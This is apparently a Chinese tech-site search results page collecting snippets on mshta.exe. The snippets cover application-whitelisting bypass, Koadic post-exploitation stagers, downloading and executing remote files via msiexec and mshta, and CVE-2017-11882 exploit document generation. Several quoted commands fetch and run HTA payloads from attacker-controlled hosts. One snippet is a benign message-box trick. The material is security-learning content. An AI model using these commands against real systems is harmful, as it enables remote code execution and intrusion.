首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往
您找到你想要的搜索结果了吗?
是的
没有找到

使用mshta.exe绕过应用程序白名单(多种方法)

运行Microsoft HTML应用程序主机的Mshta.exe,Windows OS实用程序负责运行HTA(HTML应用程序)文件。我们可以运行JavaScript或Visual的HTML文件。...您可以使用Microsoft MSHTA.exe工具解析这些文件。 0x01 HTA重要性 最后,利用htaccess文件或基于浏览器的分类的其他策略转移将有助于提高利用率。...使用以下命令: mshta.exe http://192.168.1.109:8080/pKz4Kk059Nq9.hta HTA的通常文件扩展名是.hta。...我们使用了上面的命令,因为HTA被视为扩展名为.exe的任何可执行文件,因此通过mshta.exe执行。...通过输入以下命令运行受害者的文件: mshta.exe http://192.168.1.109:8080/1.h 要查看是否有会话,请打开输入命令“agents”。

1.4K20

网络安全:小心MSHTA漏洞为黑客开启远程控制之门

原理   Microsoft HTML Application Host(MSHTA)是Microsoft Windows操作系统的一部分,必须使用它才能执行HTA文件。...这个漏洞就是这样,用户运行恶意文件后,系统会调用MSHTA打开这个文件,如果这个文件中包含有HTA代码,那么系统就会立刻执行这段代码,从而引发各种安全问题。   ...当我们成功激活被攻击计算机上的Windows MSHTA脚本执行漏洞后,该计算机就会自动下载我们设置的服务端程序,我们即可对它进行远程控制操作。   ...首先从网上下载Windows MSHTA脚本执行漏洞的利用工具,之后打开命令提示符窗口,进入漏洞利用工具所在的文件夹,然后查看工具的使用方法。   ...防范措施:用户想要成功地对Windows MSHTA脚本执行漏洞进行防范,最简单的方法就是尽快安装微软推出的安全补丁,这样就可彻底根除该漏洞对系统的危害。

1.1K00

浅谈一下mshta在CVE-2017-11882里的命令构造

如果要用43个字节来完成一个文件的下载执行,在我所掌握的命令行知识里,除了mshta命令,其它的好像都做不到。...所以在这里我就浅谈一下如何构造这个mshta命令,另外提一下hta文件在安全方面的一个应用。 mshta.exe是微软Windows操作系统相关程序,用于执行.HTA文件。...mshta执行.hta文件,是以当前用户权限执行,hta文件可以随便改后缀,也可以本地或远程执行,本地执行的时候,要记得带全路径名,否则会出错。...另外,mshta支持各种协议,甚至支持mk:@MSITStore协议或是ms-its协议。 ? 一、HTA文件 内嵌的html文件如何去除本地安全认证呢?...然后,你可以把这个1.hta改名1.xml之类的文件放在远程空间了,直接mshta http://www.site.xom/1.xml,就可以了。

1.3K80

后渗透工具Koadic:你真的了解我吗?

/koadic //用最高权限运行koadic 打开Koadic,显示需要设置的内容 下图命令如下 (koadic: sta/js/mshta)# info // 查看需要设置的内容 ?...查看工具使用帮助 (koadic: sta/js/mshta)# help ?...大佬跳过我的翻译,英语很渣而且是全靠感觉翻译的(很辛苦,靠经验和百度翻译蒙) (koadic: sta/js/mshta)# help //帮助的意思 COMMAND DESCRIPTION 命令 描述...其实你可以看到他弹出了事件查看器我也不知道为什么,不是我点开的啊, 也可能会好奇mshta是什么意思,正解如下 mshta.exe是微软Windows操作系统相关程序,用于执行.HTA文件 我想就是这样利用的吧...Module Description stager/js/mshta 可以使用HTML的应用程序在内存中的有效载荷mshta.exe stager/js/regsvr 可以使用regsvr32.exe

64350

渗透技巧——从github下载文件的多种方法

实现功能: msiexec /q /i https://github.com/3gstudent/test/raw/master/test.msi 注: 执行后需要手动结束进程msiexec.exe 7、mshta...mshta支持http和htpps 但mshta在执行hta脚本时,类似于浏览器,会根据链接返回头进行对应的解析操作,所以这里只有当返回头为html时才会运行 否则会被当普通文本进行解析 对于github...的代码,返回的格式为text/plain 如果使用如下命令执行: mshta https://raw.githubusercontent.com/3gstudent/test/master/calc.hta...经过以上的测试,我们发现IE浏览器默认会拦截vbs脚本实现的下载功能 那么,我们可以大胆猜测,如果下载执行换成powershell实现的话,那么就不会被拦截 修改脚本,上传至github 命令如下: mshta...downloadexec2.hta 经过测试,该方法可用 使用短地址 有趣的是 http://dwz.cn/ 不支持该域名 换一个短地址网站 http://sina.lt/ 生成短地址,最终命令为: mshta

3.5K20

windows显示Linux对话框程序,在cmd命令行中弹出Windows对话框(使用mshta.exe命令)…

有时候用bat写一些小脚本最后会弹出对话框提示操作成功,可以用mshta.exe来实现,它是Windows系统的相关程序,用来执行.HTA文件,一般计算机上面都有这个程序,实现如下: mshta vbscript...:msgbox(“我是提示内容”,64,”我是提示标题”)(window.close) 弹出对话框如下图: 如果没有mshta这个程序的话,那么就临时产生一个vbs脚本来实现,完了再删除这个脚本就行了...这样的话效果和上面是相同的 http://www.cnblogs.com/freeweb/p/5048833.html 在cmd命令行中弹出Windows对话框 有时候用bat写一些小脚本最后会弹出对话框提示操作成功,可以用mshta.exe...来实现,它是Windows系统的相关程序,用来执行.HTA文件,一般计算机上面都有这个程序,实现如下: mshta vb … Cmder命令行工具在Windows系统中的配置 一.Cmder简介 Cmder

1.7K10

CVE-2017-11882复现及防御

字符限制的脚本 ( github 上还有 109 字符限制的脚本),命令长度有 43 字符的限制,可以使用 URIPATH 设置路径,尽量短一点,避免加起来超过 43 字符,这里生成的代码 payload 是: mshta.exehttp...://192.168.9.27:8080/test 2、使用脚本生成漏洞doc文件,代码如下: python Command_CVE-2017-11882.py -c "mshta http://192.168.9.27...:8080/test" -otest2.doc 测试机打开 doc 文件后就会通过 mshta 去执行链接中的 hta 嵌套的 VBS 代码,从而执行 powershell 命令,随便用一个浏览器打开链接...pythonCommand_CVE-2017-11882.py -c "mshta http://192.168.2.103:8080/test"-o test3.doc 3、用测试机打开 doc 文件.../en-US/security-guidance/advisory/CVE-2017-11882 大家可以安装补丁修复该漏洞并开启自动更新功能,另外大部分杀软已经采取了防御措施,经测试部分杀软直接把 mshta

97800
领券